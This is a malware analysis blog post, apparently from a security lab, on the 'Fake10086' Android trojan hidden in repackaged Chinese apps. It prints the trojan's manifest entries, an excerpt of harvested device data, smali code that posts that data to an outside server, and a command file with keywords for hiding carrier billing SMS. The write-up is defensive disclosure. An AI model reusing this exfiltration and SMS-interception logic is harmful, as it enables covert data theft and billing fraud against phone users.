Update:

  • At least two instances were found, one is inside the pirated chinamobile 3rd parter helper app, one is inside the pirated hotel reservation app. Both are found in China local sites.

--

    10086 is a customer service portal for ChinaMobile users, they can use web page, SMS, phone call to get access to the service. There are 3rd party that published Android application called chinamobile100 to help user to utilize SMS (in most cases, are free) to query the bill, GPRS network traffic volume, trun on/off roaming and and so on.

 

    However, we found there exists some repackaged versions and distribute in China local website, we named it as "Fake10086". The malware maker or distributor claimed their version is beautified or 2 RMB bill discount to bait user to install it. This incident got our awareness since some users post complaints in forums about 2 RMB ~ 4 RMB lost or unable to receive query result from 10086 if send the request from SMS manually. Note that this trojan only affect China users from current analysis.

    It modified AndroidManifest.xml to register several receivers to react based on events below:
       

<receiver android:name="com.mms.bg.transaction.SmsReceiver">
            <intent-filter>
                <action android:name="com.android.mms.transaction.MESSAGE_SENT" />
                <data android:scheme="content" />
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.SEND_MESSAGE" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.mms.bg.transaction.PrivilegedSmsReceiver" android:permission="android.permission.BROADCAST_SMS">
            <intent-filter android:priority="1000">
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.mms.bg.ui.BootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.mms.bg.ui.AutoSMSRecevier">
            <intent-filter>
                <action android:name="com.mms.bg.SMS" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.mms.bg.ui.InternetStatusReceiver">
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
            </intent-filter>
        </receiver>

Listing 1:  AndroidManifest.xml


    Also, it changes first launch point and permissions:


    
<activity android:theme="@android:style/Theme.NoTitleBar.Fullscreen" android:label="@string/app_name"   android:name="com.mms.bg.ui.FakeLanucherActivity">
              <intent-filter>
                  <action android:name="android.intent.action.MAIN" />
                  <category android:name="android.intent.category.LAUNCHER" />
                  <category android:name="android.intent.category.DEFAULT" />
              </intent-filter>
          </activity>


      <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
      <uses-permission android:name="android.permission.RECEIVE_SMS" />
      <uses-permission android:name="android.permission.SEND_SMS" />
      <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
      <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
      <uses-permission android:name="android.permission.READ_PHONE_STATE" />
      <uses-permission android:name="android.permission.WAKE_LOCK" />
      <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
      <uses-permission android:name="android.permission.INTERNET" />

Listing 2:  AndroidManifest.xml (cont.)


    If we trigger BOOT_COMPLETED event by rebooting the phone, we can observe a service - BgService - is launched :

Figure 1, Log output from DDMS.


    The trojan stored personal information such as IMEI, phone number, smsc together with other usage infomation
 to /data/data/com.hotel/files/.hide/upload.xml

<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
  <body>
    <imei>354059022277352</imei>
    <version>1.0.1</version>
    <smscenter>8613800100500</smscenter>
    <first>1</first>
    <handled>0</handled>
    <pid>20013</pid>
    <installtime>3 Mar 2011 09:13:38 GMT</installtime>
    <sysversion>7</sysversion>
    <auth>michael</auth>
    <fare>0</fare>
    <phonenum>+886928216512</phonenum>
    <reason>simLoaded</reason>
  </body>

 Listing 3:  upload.xml

 

    And it uploads via HttpPost/HttpClient to http://www.youlubg.com:81/Coop/request3.php

  new-instance v8, Ljava/net/URI;
  const-string v9, "http://www.youlubg.com:81/Coop/request3.php"
  invoke-direct {v8, v9}, Ljava/net/URI;-><init>(Ljava/lang/String;)V
  invoke-virtual {v6, v8}, Lorg/apache/http/client/methods/HttpPost;->setURI(Ljava/net/URI;)V
  ...
  invoke-interface {v5, v6}, Lorg/apache/http/client/HttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;

 Listing 4:  ...\com\mms\bg\ui\SettingManager.smali

    Later server responded a serverInfo.xml

<?xml version="1.0" encoding="UTF-8" ?>
  <body>
    <auto_run>1</auto_run>
    <auto_link_time>24</auto_link_time>
    <version>1.0.1</version>
    <channel>
    <channel_name>vedio</channel_name>
    <vedio_url>http://211.136.165.53/wl/rmw1s/pp66.jsp</vedio_url>
    <channel_sms>2</channel_sms>
    <intercept_key>
    <key>移动</key>
    <key>费用</key>
    <key>1元</key>
    <key>2元</key>
    </intercept_key>
    <intercept_time>2000</intercept_time>
    <limit_nums_day>4</limit_nums_day>
    <limit_nums_month>4</limit_nums_month>
    </channel>
  </body>

Listing 5: serverInfo.xml
 

    Where some filter keywords like 移动/费用/1元/2元 are stored to intercept SMS notification sent by Carrier (China Mobile), thus user won't aware this and can't contact service window to cancel the unwanted subscription.
There is an URL - http://211.136.165.53/wl/rmw1s/pp66.jsp, after googling, it seems a free video services but was ended up in 2011-02-28. And server is not responding at the time of this writing.

    So far we can ensure that it indeed upload user's privacy data to remote server and get corresponding command-like xml back. We saw some complaints on China forum regarding sending SMS without user's awareness to 10086901 for unwanted service, which may lead to high phone bill as well.  We will update our analysis once we have further information.

   Added in 2011-03-11: Fortinet has an in-depth analysis (step by step) how the code to block the SMS, see http://blog.fortinet.com/how-androidfake10086-selectively-blocks-sms-step-by-step/

By AegisLab

Analyzer: Aaron Li.